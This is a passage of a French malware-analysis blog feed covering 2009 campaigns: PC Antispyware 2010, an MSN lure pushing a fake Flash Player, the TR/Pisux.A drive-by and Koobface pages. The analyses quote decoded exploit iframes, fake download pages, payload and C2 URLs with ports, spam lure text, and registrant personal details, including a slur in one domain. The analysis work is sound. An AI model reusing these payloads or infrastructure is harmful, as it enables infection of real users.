<p><img alt="FakeAlert / Braviax : PC Antispyware 2010" src="http://mad.internetpol.fr/imgupz/Braviax_FakeAlert.jpg" /> <img alt="Zarestel Ferrer : PC Antispyware 2010's Scheming Password Protection" src="http://mad.internetpol.fr/imgupz/BraviaxDownloads.gif" /></p> 
<p> </p> 
<p>DNS: <strong style="color: #870000;">SEARCH-NOWS.CN</strong> - IP: <strong style="color: #870000;">112.137.162.135</strong><br />Registrant Name: LucasSteven (steven_lucas_2000@yahoo.com)<br />Registration Date: 2009-07-30 20:24<br />Expiration Date: 2010-07-30 20:24 <br /></p> 
<p> </p> 
<p>DNS: <span style="font-weight: bold; color: #870000;">WONDER</span><strong style="color: #870000;">-HOW.CN</strong> - IP: <strong style="color: #870000;">83.133.126.46</strong><br />
Registrant Name: LucasSteven (steven_lucas_2000@yahoo.com)<br />
Registration Date: 2009-07-30 20:24<br />
Expiration Date: 2010-07-30 20:24</p> 
<p>  <div class="bb-code-title">work2.tmp</div><div class="bb-quote">Text#####percent###<br />&lt;t&gt;Don't miss this information, check that http://myfxadvice.com forex investment offer.&lt;/t&gt;<br />&lt;t&gt;Haven't seen such http://myfxadvice.com forex market before.&lt;/t&gt;<br />&lt;t&gt;hey, just check this great http://myfxadvice.com metatrader opportunity.&lt;/t&gt;<br />&lt;t&gt;you know, this http://myfxadvice.com forex trading information can be very useful for you&lt;/t&gt;<br />&lt;t&gt;have you checked this http://myfxadvice.com forex system?&lt;/t&gt;<br />&lt;t&gt;Don't miss this investment opportunity, check that http://myfxadvice.com forex investment offer.&lt;/t&gt;<br />&lt;t&gt;Here, just read this opportunity I trust http://myfxadvice.com trading platform provider.&lt;/t&gt;<br />&lt;t&gt;Here, read this http://myfxadvice.com trading platform provider.&lt;/t&gt;<br />&lt;t&gt;By the way, forgot to tell you that i found http://myfxadvice.com managed forex trading company. Check them.&lt;/t&gt;<br />&lt;t&gt;i've got a http://myfxadvice.com forex trading business for you.&lt;/t&gt;<br />&lt;t&gt;Have you ever seen this http://myfxadvice.com automated forex platform?&lt;/t&gt;<br />&lt;t&gt;here is an http://myfxadvice.com investment process you might be interested in&lt;/t&gt;<br />&lt;t&gt;have you ever checked this http://myfxadvice.com forex system?&lt;/t&gt;<br />&lt;t&gt;Look, i've marked for me this http://myfxadvice.com profitable forex system.&lt;/t&gt;</div>
</p> 
<p>DNS: <strong style="color: #870000;">MYFXADVICE.COM</strong> - IP: <strong style="color: #870000;">61.235.117.72</strong><br />Organization: Justin Dickerson LTD (justin_dickerson@ymail.com)<br />Creation Date: 21-aug-2009<br />Expiration Date: 21-aug-2010<br /><br />Name: Justin Dickerson<br />Address: 5454 Dorr Street C8<br />City: Toledo<br />Province/state: OH<br />Country: US<br />Postal Code: 43615</p> 
<p><br /></p> 
<p> </p> 
<p> </p> 
<p> </p> 
<p>Ce matin, <span style="text-decoration: underline;">le site a été corrigé</span> mais observez les commentaires des jours précédents... Négligence caractérisée ?</p> 
<p><div class="bb-code-title">Extrait</div><div class="bb-quote">Alexandria dit:<br />5 septembre 2009 à 16:14<br /><br />Cher Jean-Luc, j’ai déjà eu l’occasion de te signaler un sondage OpinionWay dans lequel, à la question des préférences partisanes, tous les partis étaient représentés, sauf le PG. C’est un oubli qui me paraît volontaire. Aujourd’hui, je me rend sur ton site, et j’ai, à répétition, le message suivant : ” <em style="color: #ff0000;">Le site web que vous visitez semble contenir un logiciel malveillant. Celui-ci peut endommager votre ordinateur ou s’exécuter sans votre consentement. Votre ordinateur pourrait être infecté en naviguant simplement vers un site contenant un logiciel malveillant, sans action supplémentaire de votre part.” Pour plus d’informations sur les problèmes détectés sur ce site ou sur l’une de ses portions, veuillez visiter la page de diagnostic ” Google Safe Browsing” pour sarra-ditol.cn. </em>” Et le message me donne le choix de cliquer sur <em>“ignorer l’avertissement”</em> ou <em>“fermer la page”</em>.<br /><br /><font size="3"><strong>Évidemment j’ai ignoré l’avertissement, sinon je ne serais pas là à t’écrire…</strong></font> </div> </p> 
<p>Et le plus triste, c'est que ce n'est pas la seule à réagir ainsi, vous comprenez mieux pourquoi la sécurité informatique se transforme souvent en <u>un échec</u>. Ma dernière phrase me fait penser aux excellents commentaires de Mr. news0ft, je vous invite d'ailleurs à lire son billet sur <a title="news0ft : Message aux lecteurs de DC" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=745&amp;entry_id=55"  onmouseover="window.status='http://news0ft.blogspot.com/2009/09/message-aux-lecteurs-de-dc.html';return true;" onmouseout="window.status='';return true;">l'irruption des états</a> dans le domaine de la <a title="Wikipedia: SSI" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=746&amp;entry_id=55"  onmouseover="window.status='http://fr.wikipedia.org/wiki/S%C3%A9curit%C3%A9_du_syst%C3%A8me_d%27information';return true;" onmouseout="window.status='';return true;">SSI</a>.</p> 
<p> </p> 
<p><em>ps:</em> Je tiens à remercier Bruno pour <a href="http://mad.internetpol.fr/exit.php?url_id=747&amp;entry_id=55"  onmouseover="window.status='http://bruno.kerouanton.net/blog/2009/09/06/frhack-in-live/';return true;" onmouseout="window.status='';return true;" target="_blank" title="Bruno Kerouanton - frhack 2009">les photos</a> en direct de la <a href="http://mad.internetpol.fr/exit.php?url_id=748&amp;entry_id=55"  onmouseover="window.status='http://www.frhack.org/frhack-conference.php';return true;" onmouseout="window.status='';return true;" target="_blank" title="Event: frhack.org (FRANCE)">FRHACK</a> ! <br />Vous avez manqué cet évènement ? Rassurez-vous les DVD seront disponibles, <a title="FRHACK's DVD ISO images" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=749&amp;entry_id=55"  onmouseover="window.status='http://www.mediatux.com/purchasefrhack.php';return true;" onmouseout="window.status='';return true;">ici</a>.</p> 
<p>Liens connexes: <br />- <a href="http://mad.internetpol.fr/exit.php?url_id=767&amp;entry_id=55"  onmouseover="window.status='http://community.ca.com/blogs/securityadvisor/archive/2009/09/08/pc-antispyware-2010-s-scheming-password-protection.aspx?MalwareScene';return true;" onmouseout="window.status='';return true;" target="_blank" title="Zarestel Ferrer : PC Antispyware 2010's Scheming Password Protection">PC Antispyware 2010's Scheming Password Protection</a> ( Zarestel Ferrer (<em>CA</em>), September 9, 2009 )<br />- <a title="bytesandbadges - David Oxley: Unpatched WordPress Users Hit by Worm" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=764&amp;entry_id=55"  onmouseover="window.status='http://bytesandbadges.wordpress.com/2009/09/08/unpatched-wordpress-users-hit-by-worm/';return true;" onmouseout="window.status='';return true;">Unpatched WordPress Users Hit by Worm</a> ( David Oxley (<em>BytesAndBadges</em>), September 8, 2009 )<br />- <a title="WordPress attacks hit unpatched blog platforms" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=754&amp;entry_id=55"  onmouseover="window.status='http://www.scmagazineus.com/WordPress-attacks-hit-unpatched-blog-platforms/article/148353/';return true;" onmouseout="window.status='';return true;">WordPress attacks hit unpatched blog platforms</a> ( Chuck Miller (<em>SC Magazine US</em>), September 8, 2009 )<br />- <a target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=766&amp;entry_id=55" title="http://threatpost.com/blogs/hacking-services-rise-109"  onmouseover="window.status='http://threatpost.com/blogs/hacking-services-rise-109';return true;" onmouseout="window.status='';return true;">Hacking Services On the Rise !</a> ( Dennis Fisher (<em>Digital Underground</em>), September 9, 2009 )</p> 
<p><br /></p> 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://mad.internetpol.fr/archives/54-SE-for-Kids-La-bataille-des-Kevins..html" rel="alternate" title="SE for Kids: La bataille des Kevins." />
        <author>
            <name>Karen</name>
                    </author>
    
        <published>2009-08-29T14:02:00Z</published>
        <updated>2009-08-29T15:48:23Z</updated>
        <wfw:comment>http://mad.internetpol.fr/wfwcomment.php?cid=54</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://mad.internetpol.fr/rss.php?version=atom1.0&amp;type=comments&amp;cid=54</wfw:commentRss>
    
    
        <id>http://mad.internetpol.fr/archives/54-guid.html</id>
        <title type="html">SE for Kids: La bataille des Kevins.</title>
        <content type="xhtml" xml:base="http://mad.internetpol.fr/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                <p>Chinois, ukrainien, russe, américain, ... non aujourd'hui le menu sera français.</p> 
<p>Voilà maintenant deux mois que la &quot;<strong>Bataille des <a href="http://mad.internetpol.fr/exit.php?url_id=717&amp;entry_id=54"  onmouseover="window.status='http://desencyclopedie.wikia.com/wiki/Kevin';return true;" onmouseout="window.status='';return true;" target="_blank" title="Qu'est ce qu'un Kevin ?">Kevins</a></strong>&quot; a débutée ou plus communément nommée, &quot;<em>vacances scolaires</em>&quot;.</p> 
<p>Bien loin des plats sérieux du quotidien, je vous propose en entrée du <a title="Ingénierie Sociale - Sécurité de l'information" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=721&amp;entry_id=54"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Ing%C3%A9nierie_sociale_(s%C3%A9curit%C3%A9_de_l%27information)';return true;" onmouseout="window.status='';return true;">SE</a> sauce spéciale au <a href="http://mad.internetpol.fr/exit.php?url_id=720&amp;entry_id=54"  onmouseover="window.status='http://media.telemarket.fr/imgnwprd/001/001572/00157260/00157260-t0.jpg';return true;" onmouseout="window.status='';return true;" target="_blank" title="Le beurre Président (joke)">beurre &quot;Président&quot;</a>.</p> 
<p><div class="bb-code-title"></div><div class="bb-quote">&lt;title&gt;MoviesTube - Sarko : La Giffle (officiel)&lt;/title&gt;</div></p> 
<p>Jolies fautes, n'est ce pas ? Vous l'aurez compris, je vous propose un instant de détente...<br /><br /></p> <p>
La notification provient du site communautaire français <a title="commentcamarche.net : hack-msn" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=711&amp;entry_id=54"  onmouseover="window.status='http://www.commentcamarche.net/forum/affich-14092658-hack-msn';return true;" onmouseout="window.status='';return true;">CCM</a>. <br />L'utilisateur n'est pas tombé dans le piège, mieux, il a eu le réflexe de réaliser des captures d'écrans pour immortaliser la scène.<br />L'attaquant <u>usurpe l'identité</u> de MIKE dans le but d'établir une <u>relation de confiance</u>.<br />Lui demande de visiter un site qui contient la vidéo du président <a title="Wikipedia: Nicolas Sarkozy" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=719&amp;entry_id=54"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Nicolas_Sarkozy';return true;" onmouseout="window.status='';return true;">Nicolas Sarkozy</a> se faisant gifler.<br /> 
Un message indique que pour visualiser cette vidéo, il est nécessaire de télécharger la nouvelle version d'Adobe Flash Player: &quot;<a title="7e6e4f56abfed963607284efb65acc0d" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=712&amp;entry_id=54"  onmouseover="window.status='https://www.virustotal.com/fr/analisis/f6f3152b9da137911c531f376e700c7c163c5212eb9a97d693f496d43cfcb2e3-1251496823';return true;" onmouseout="window.status='';return true;">Flash_Players.exe</a>&quot;<br />L'icône du programme représente une tête de mort, on ne peux pas dire que ça soit très astucieux.<br />En réalité, ce n'est pas la volonté de l'attaquant, c'est l'icône par défaut utilisé par l'outil, &quot;Skull Crypter v2&quot;<br /> </p> 
<p> <u>Caractéristiques</u>:<br />- Runtime<br />- Cryptage RC4 , XOR &amp; ASCII<br />- Password<br />- FUD!</p> 
<p> Dans les jargons des terreurs des bacs à sable, &quot;<em>FUD</em>&quot; signifie &quot;<em>Fully UnDetectable</em>&quot;.<br />Encore une fois, la célèbre technique de la languette <a title="Advanced RE methods ( joke )" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=713&amp;entry_id=54"  onmouseover="window.status='http://lartdeschoix.unblog.fr/files/2009/06/flamby.jpg';return true;" onmouseout="window.status='';return true;">Flamby</a> fait des miracles.<br />Une fois démoulé, on observe que le <a href="http://mad.internetpol.fr/exit.php?url_id=714&amp;entry_id=54"  onmouseover="window.status='https://www.virustotal.com/fr/analisis/ee300f5eed00d79f72a45090ba556784de1442daf176adf29ef711e96bbe63e3-1251498157';return true;" onmouseout="window.status='';return true;" target="_blank" title="2009.08.28 22:22:37 (UTC) - 22/41 (53.66%)">programme</a> est protégé par l'excellent logiciel commercial, &quot;<a title="Oreans Technology : Software Security Defined" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=715&amp;entry_id=54"  onmouseover="window.status='http://www.oreans.com/';return true;" onmouseout="window.status='';return true;">Themida</a>&quot;.<br />Ce qui n'empêchera pas d'obtenir son bot initial et d'en extraire la configuration. (<em>en rouge</em>)<br /></p> 
<p><img src="http://mad.internetpol.fr/imgupz/kidsgames.jpg" /></p> 
<p>En dessert, réseau de <a href="http://mad.internetpol.fr/exit.php?url_id=722&amp;entry_id=54"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Machine_zombie';return true;" onmouseout="window.status='';return true;" target="_blank" title="Machine Zombie">zombies</a> à la Frenchie.</p> 
<p>Une histoire banale probablement orchestrée par des enfants ... </p> 
<p>Les ingrédients de cette recette sont pourtant à retrouver dans le livre de cuisine de la &quot;<a href="http://mad.internetpol.fr/exit.php?url_id=716&amp;entry_id=54"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Cybercrime';return true;" onmouseout="window.status='';return true;" target="_blank" title="Cybercrime">Cybercriminalité</a>&quot;.</p> 
<p>Face à des situations similaires, n'hésitez pas à signaler les faits ou à déposer des plaintes.<br /></p> 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://mad.internetpol.fr/archives/53-TRPisux.A-Loading-video...if-this-takes-a-long-time.html" rel="alternate" title="TR/Pisux.A - Loading video...if this takes a long time" />
        <author>
            <name>Matt</name>
                    </author>
    
        <published>2009-08-28T06:12:00Z</published>
        <updated>2009-08-28T08:59:44Z</updated>
        <wfw:comment>http://mad.internetpol.fr/wfwcomment.php?cid=53</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://mad.internetpol.fr/rss.php?version=atom1.0&amp;type=comments&amp;cid=53</wfw:commentRss>
    
    
        <id>http://mad.internetpol.fr/archives/53-guid.html</id>
        <title type="html">TR/Pisux.A - Loading video...if this takes a long time</title>
        <content type="xhtml" xml:base="http://mad.internetpol.fr/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                <p>Encore un nom de domaine qui revient de l'outre tombe. Expiré au mois de juin, ré-enregistré le 26 août et déjà au travail.</p> 
<p>&#160;&#160; DNS: <strong style="color: #a50a0a;">HI5PHOTOS.NET</strong> (<em>98.136.92.79 - p6p.geo.vip.ac4.yahoo.com</em>)<br />&#160;&#160; Name Server: YNS1.YAHOO.COM<br />&#160;&#160; Name Server: YNS2.YAHOO.COM<br />&#160;&#160; Registrar: MELBOURNE IT, LTD. D/B/A INTERNET NAMES WORLDWIDE<br />&#160;&#160; Creation: 26-aug-2009<br />&#160;&#160; Updated: 26-aug-2009<br />&#160;&#160; Expiration: 26-aug-2010</p> 
<p>L'index de &quot;hi5photos.net&quot; contient:<br /><div class="bb-code-title"></div><div class="bb-quote">Loading video...if this takes a long time try:&lt;br&gt;<br />To download a new version &lt;a href=adobe_flash_player.exe border=0&gt;Here&lt;/a&gt;&lt;br&gt;<br />Or download the full video &lt;a href=bar_rafaeli.wmv.exe border=0&gt;here&lt;/a&gt;<br />&lt;META HTTP-EQUIV=&quot;Refresh&quot; CONTENT=&quot;3; URL=dl.php&quot;&gt;</div><br /></p><img src="http://mad.internetpol.fr/imgupz/hi5photos_net_js.gif" alt="Malicious JavaScript" /> <p> </p><br /> 
<p>Le programme &quot;<a title="adobe_flash_player.exe - 0ca957fd81ae50c7e2cc46242fb90c6b" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=704&amp;entry_id=53"  onmouseover="window.status='http://www.threatexpert.com/report.aspx?md5=0ca957fd81ae50c7e2cc46242fb90c6b';return true;" onmouseout="window.status='';return true;">adobe_flash_player.exe</a>&quot; est compressé UPX.<br />MD5: 0ca957fd81ae50c7e2cc46242fb90c6b<br />SHA1: 7d5b2c15342b7cf0e926f4f80226de676610c268
<br />VT: <a href="http://mad.internetpol.fr/exit.php?url_id=705&amp;entry_id=53" title="https://www.virustotal.com/fr/analisis/35a19238ff6dd3b22af073cdef66ecf7ead92d32e182a0b2607921d6a3282f3d-1251395787"  onmouseover="window.status='https://www.virustotal.com/fr/analisis/35a19238ff6dd3b22af073cdef66ecf7ead92d32e182a0b2607921d6a3282f3d-1251395787';return true;" onmouseout="window.status='';return true;" target="_blank">2009.08.27 17:56:27 (UTC) - 7/41 (17.07%)</a><br /><br />Télécharge: http<em>://</em>www.hotlinkfiles.com/files/2772987_2q7bl/load.exe<br />MD5: ba906422af3dd4259ec4c8a7fcf2572d<br />SHA1: 46e22b2c9d1191843ce9dfe8a6d5a20907a73aab<br /> 
Le <a href="http://mad.internetpol.fr/exit.php?url_id=706&amp;entry_id=53"  onmouseover="window.status='http://www.threatexpert.com/report.aspx?md5=ba906422af3dd4259ec4c8a7fcf2572d';return true;" onmouseout="window.status='';return true;" target="_blank" title="ba906422af3dd4259ec4c8a7fcf2572d">rapport TE de cet échantillon</a> n'est pas très bavard, celui-ci retourne une erreur.TR/Pisux.A<br />Les résultats VT suivant les différentes étapes de l'analyse.<br />- <a href="http://mad.internetpol.fr/exit.php?url_id=707&amp;entry_id=53" title="https://www.virustotal.com/fr/analisis/f0c6ffa5825297e24d3ee60f88199159844f302d72bb20b4341bc6a368af17f9-1251404175"  onmouseover="window.status='https://www.virustotal.com/fr/analisis/f0c6ffa5825297e24d3ee60f88199159844f302d72bb20b4341bc6a368af17f9-1251404175';return true;" onmouseout="window.status='';return true;" target="_blank">2009.08.27 20:16:15 (UTC) - 2/41 (4.88%)</a><br />- <a href="http://mad.internetpol.fr/exit.php?url_id=708&amp;entry_id=53" title="https://www.virustotal.com/fr/analisis/48fd25475551ac4e6c9e088df2b4d2a623a514a67c63c2ab46988fb6be902970-1251404189"  onmouseover="window.status='https://www.virustotal.com/fr/analisis/48fd25475551ac4e6c9e088df2b4d2a623a514a67c63c2ab46988fb6be902970-1251404189';return true;" onmouseout="window.status='';return true;" target="_blank">2009.08.27 20:16:29 (UTC) - 9/41 (21.96%)</a><br /><div class="bb-code-title"></div><div class="bb-quote">AntiVir &#160;&#160;&#160; 7.9.1.7 &#160;&#160;&#160; 2009.08.27 &#160;&#160;&#160; TR/Pisux.A</div>Pisux, le nom du fichier déposé dans %TMP%, quelle originalité :]</p> 
<p>Le lien qui nous a été signalé était le suivant:<br />http<em>://</em>www.hi5photos.net/images.php?i=PICT00020090827.JPG</p> 
<p>La page &quot;<font face="courier new,courier,monospace">images.php</font>&quot; contient:<br /><div class="bb-code-title"></div><div class="bb-quote">&lt;frameset rows=70,* border=0&gt;<br />&lt;frame name=top src=dl.php?i= noresize border=0&gt;<br />&lt;frame name=main src=dl2.php noresize border=0&gt;<br />&lt;frame name=main2 src=dl3.php noresize border=0&gt;<br />&lt;/frameset&gt;</div><br /><br />La page &quot;<font face="courier new,courier,monospace">dl.php?i=</font>&quot; permet d'afficher le message:<br /><div class="bb-code-title"></div><div class="bb-quote">&lt;center&gt;Now downloading: PICT00020090827.JPG&lt;br&gt;</div><br /><br />La page &quot;<font face="courier new,courier,monospace">dl2.php</font>&quot; contient un exploit, une fois décodé:<br /><div class="bb-code-title"></div><div class="bb-quote">&lt;iframe name=&quot;h7Jxr&quot; width=&quot;1&quot; height=&quot;0&quot;src=&quot;http<em>://</em>64.202.102.97/images/banner.php&quot; marginwidth=<br />&quot;1&quot; marginheight=&quot;0&quot; title=&quot;cebjhNhodbVC6pfPF&quot; scrolling=&quot;no&quot; border=&quot;0&quot; frameborder=&quot;0&quot;&gt;&lt;iframe&gt;</div><br /><br />La page &quot;<font face="courier new,courier,monospace">banner.php</font>&quot; va télécharger l'animation flash &quot;98757182190.swf&quot;<br /><br />La page &quot;<font face="courier new,courier,monospace">dl3.php</font>&quot; télécharge le programme &quot;<a title="IMG000020090825-JPG.EXE - 4fe15ad6d7170507132c6eb71fc164c1" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=709&amp;entry_id=53"  onmouseover="window.status='http://www.threatexpert.com/report.aspx?md5=4fe15ad6d7170507132c6eb71fc164c1';return true;" onmouseout="window.status='';return true;">IMG000020090825-JPG.EXE</a>&quot;<br />Packer: Microsoft CAB SFX (Suspicious)<br />MD5: 4fe15ad6d7170507132c6eb71fc164c1<br />SHA1: e4cf6f0c38a32e035f95df110e83e6481356d7e2<br />VT: <a href="http://mad.internetpol.fr/exit.php?url_id=710&amp;entry_id=53" title="https://www.virustotal.com/fr/analisis/62fc38332e65de71944b7a0a844fd4f0ed64fbd5eb931ec5fbc315a3c4c2c35b-1251397199"  onmouseover="window.status='https://www.virustotal.com/fr/analisis/62fc38332e65de71944b7a0a844fd4f0ed64fbd5eb931ec5fbc315a3c4c2c35b-1251397199';return true;" onmouseout="window.status='';return true;" target="_blank">2009.08.27 18:19:59 (UTC) - 4/41 (9.76%)</a><br /><br /><img src="http://mad.internetpol.fr/imgupz/dl3steps.gif" alt="IMG000020090825-JPG.EXE steps" /></p> 
<p>Botnet: ›› <span style="color: #a50a0a;">S0URCE.CRKRXER.NET</span><br />Botnet: ›› <span style="color: #a50a0a;">NIGGER.IROXUSUX.COM</span><br />Botnet: ›› <span style="color: #a50a0a;">JESTER.IZTHEWIZ.NET</span><br />• <strong><span style="color: #a50a0a;">85.90.162.28:60500/TCP</span></strong><br />• <span style="color: #a50a0a;">66.225.219.106:60500/TCP</span><br />JOIN ##KAZAHKSTAN##<br /><img src="http://mad.internetpol.fr/imgupz/1432003100.gif" /></p> 
<p><br />&#160;&#160; Domain Name: <strong style="color: #a50a0a;">CRKRXER.NET</strong><br />&#160;&#160; Name Server: D1.REGNAME.BIZ<br />&#160;&#160; Name Server: D2.REGNAME.BIZ<br />&#160;&#160; Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM<br />&#160;&#160; Creation: 11-jun-2009<br />&#160;&#160; Updated: 12-aug-2009<br />&#160;&#160; Expiration: 11-jun-2010<br /></p> 
<address>&#160;&#160;&#160; Spicy Nikka (<em>thecr3w@live.com</em>)</address> 
<address>&#160;&#160;&#160; Rubert 5</address> 
<address>&#160;&#160;&#160; Bolanche</address> 
<address>&#160;&#160;&#160; Clastro,62433</address> 
<address>&#160;&#160;&#160; TOKELAU</address> 
<p> </p> 
<p> </p> 
<p>&#160;&#160; DNS: <strong style="color: #a50a0a;">IROXUSUX.COM</strong><br />&#160;&#160; Name Server: NS1.NSNOC.COM<br />&#160;&#160; Name Server: NS2.NSNOC.COM<br />&#160;&#160; Registrar: ENOM, INC.<br />&#160;&#160; Creation: 11-jun-2009<br />&#160;&#160; Updated: 12-jun-2009<br />&#160;&#160; Expiration: 11-jun-2010<br /></p> 
<address>&#160;&#160;&#160; Azamat Bogatov (<em>rapemybiz@gmail.com</em>)</address> 
<address>&#160;&#160;&#160; Kazhakstreet 5</address> 
<address>&#160;&#160;&#160; Borat,&#160; 55363</address> 
<address>&#160;&#160;&#160; KAZAHKSTAN</address> 
<p><br />&#160;&#160; DNS: <strong style="color: #a50a0a;">IZTHEWIZ.NET</strong><br />&#160;&#160; Name Server: NS1.DYNADOT.COM<br />&#160;&#160; Name Server: NS2.DYNADOT.COM<br />&#160;&#160; Registrar: DYNADOT, LLC<br />&#160;&#160; Creation: 11-jun-2009<br />&#160;&#160; Updated: 11-jun-2009<br />&#160;&#160; Expiration: 11-jun-2010<br /></p> 
<address>&#160;&#160;&#160; Nelson Mandela (<em>rustyoldbastard@googlemail.com</em>)</address> 
<address>&#160;&#160;&#160; Africa 5</address> 
<address>&#160;&#160;&#160; London, Berkshire A3ERR5</address> 
<address>&#160;&#160;&#160; United Kingdom</address> 
<p><br /> </p> 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://mad.internetpol.fr/archives/52-Koobface-Les-erreurs-403-et-404-sont-piegees..html" rel="alternate" title="Koobface : Les erreurs 403 et 404 sont piégées." />
        <author>
            <name>Joe</name>
                    </author>
    
        <published>2009-08-07T06:08:00Z</published>
        <updated>2009-08-11T06:02:54Z</updated>
        <wfw:comment>http://mad.internetpol.fr/wfwcomment.php?cid=52</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://mad.internetpol.fr/rss.php?version=atom1.0&amp;type=comments&amp;cid=52</wfw:commentRss>
    
    
        <id>http://mad.internetpol.fr/archives/52-guid.html</id>
        <title type="html">Koobface : Les erreurs 403 et 404 sont piégées.</title>
        <content type="xhtml" xml:base="http://mad.internetpol.fr/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                <p>Les liens &quot;<em>périmés</em>&quot; et &quot;<em>filtrés</em>&quot; de <strong>web.reg.md</strong> , un serveur utilisé par <a target="_blank" href="archives/45-Koobface-La-confiance-accordee-a-vos-relations-doit-cesser..html">Koobface</a> , renvoient des codes erreurs <a title="Wikipedia: Erreur HTTP 404" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=696&amp;entry_id=52"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Erreur_HTTP_404';return true;" onmouseout="window.status='';return true;">404</a> et <a title="Wikipedia : Liste des codes HTTP" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=698&amp;entry_id=52"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Liste_des_codes_HTTP';return true;" onmouseout="window.status='';return true;">403</a> plutôt inattendues.<br /></p> 
<p><img src="imgupz/404.gif" /></p> 
<p>Il n'y a pas de petits profits...<br /> </p> http<em>://</em>rapidsystemsend.ru/transsend.html








<p> <img src="http://mad.internetpol.fr/imgupz/transsend.gif" /></p> 
<p>http<em>://</em>rapidsystemsend.ru/ykipomnedsa.html</p> 
<p><img src="http://mad.internetpol.fr/imgupz/ykipomnedsa.gif" /></p> 
<p>....<br />http<em>://</em>autodoregison.ru/b5/index.php<br />http<em>://</em>autodoregison.ru/b5/hAmet.swf<br />http<em>://</em>autodoregison.ru/b5/looksWhichLike.pdf<br />http<em>://</em>autodoregison.ru/b5/update.php <br /></p> 
<p> </p> 
<p> </p> 
<address><strong><font size="2">domain:&#160;&#160;&#160;&#160; <span style="color: #b41616;">RAPIDSYSTEMSEND.RU</span>  ( 211.95.78.98 ; Pékin/Chine )</font></strong></address> 
<address><strong><font size="2">domain:&#160;&#160;&#160;&#160; <span style="color: #b41616;">AUTODOREGISON.RU</span>  ( 211.95.78.98 ; Pékin/Chine )</font></strong></address> 
<p> <font size="1">type:&#160;&#160;&#160;&#160;&#160;&#160; CORPORATE<br />state:&#160;&#160;&#160;&#160;&#160; REGISTERED, DELEGATED<br />
nserver:&#160;&#160;&#160; ns1.everydns.net<br />
nserver:&#160;&#160;&#160; ns2.everydns.net<br />
nserver:&#160;&#160;&#160; ns3.everydns.net<br />
nserver:&#160;&#160;&#160; ns4.everydns.net<br />
person:&#160;&#160;&#160;&#160; Private person<br />
phone:&#160;&#160;&#160;&#160;&#160; +7 910 3478712<br />
e-mail:&#160;&#160;&#160;&#160; dmitrijstanislavskij@yandex.ru<br />
registrar:&#160; REGRU-REG-RIPN<br />
created:&#160;&#160;&#160; 2009.06.19<br />
paid-till:&#160; 2010.06.19<br />
source:&#160;&#160;&#160;&#160; TC-RIPN</font></p> Liens internes:<br /><a href="http://mad.internetpol.fr/archives/45-Koobface-La-confiance-accordee-a-vos-relations-doit-cesser..html" target="_blank" title="Malware Analysis &amp; Diagnostic - Koobface: La confiance accordée à vos relations doit cesser.">Koobface: La confiance accordée à vos relations doit cesser.</a><br /><br /> 
            </div>
        </content>
        
    </entry>
    <entry>
        <link href="http://mad.internetpol.fr/archives/51-Black-Hat-Webcast-11.html" rel="alternate" title="Black Hat Webcast #11" />
        <author>
            <name>Joe</name>
                    </author>
    
        <published>2009-06-18T06:00:00Z</published>
        <updated>2009-06-22T05:54:46Z</updated>
        <wfw:comment>http://mad.internetpol.fr/wfwcomment.php?cid=51</wfw:comment>
    
        <slash:comments>0</slash:comments>
        <wfw:commentRss>http://mad.internetpol.fr/rss.php?version=atom1.0&amp;type=comments&amp;cid=51</wfw:commentRss>
    
    
        <id>http://mad.internetpol.fr/archives/51-guid.html</id>
        <title type="html">Black Hat Webcast #11</title>
        <content type="xhtml" xml:base="http://mad.internetpol.fr/">
            <div xmlns="http://www.w3.org/1999/xhtml">
                <p> </p>
<p>Après les conférences francophones qui se sont déroulées à <a title="La ville de Rennes" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=672&amp;entry_id=51"  onmouseover="window.status='http://fr.wikipedia.org/wiki/Rennes';return true;" onmouseout="window.status='';return true;">Rennes</a> en France à l'occasion du <strong><a title="SSTIC" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=673&amp;entry_id=51"  onmouseover="window.status='http://www.sstic.org/SSTIC09/info.do';return true;" onmouseout="window.status='';return true;">SSTIC 2009</a></strong> (<em><a title="CERT LEXSI - Le SSTIC 2009" target="_blank" href="http://mad.internetpol.fr/exit.php?url_id=674&amp;entry_id=51"  onmouseover="window.status='http://cert.lexsi.com/weblog/index.php/2009/06/08/313-sstic-2009-c-est-deja-fini';return true;" onmouseout="window.status='';return true;">résumé du grand cru</a></em>), c'est au tour des États-Unis d'Amérique ; Aujourd'hui va se tenir le Black Hat Webcast avec des intervenants tels que: Dino Dai Zovi, Nitesh Dhanjani, Joe Grand, Jacob Appelbaum, Chris Tarnovsky, Nathan Hamiel, Shawn Moyer, pour présenter brièvement un avant goût de l'évènement <strong>Black Hat USA 2009</strong> qui aura lieu du <strong>25 au 30 juillet à Las Vegas</strong>. Pas moins de 70 présentations seront prévues le mois prochain et voici les intitulés...</p> <p> </p> 
<ol> 
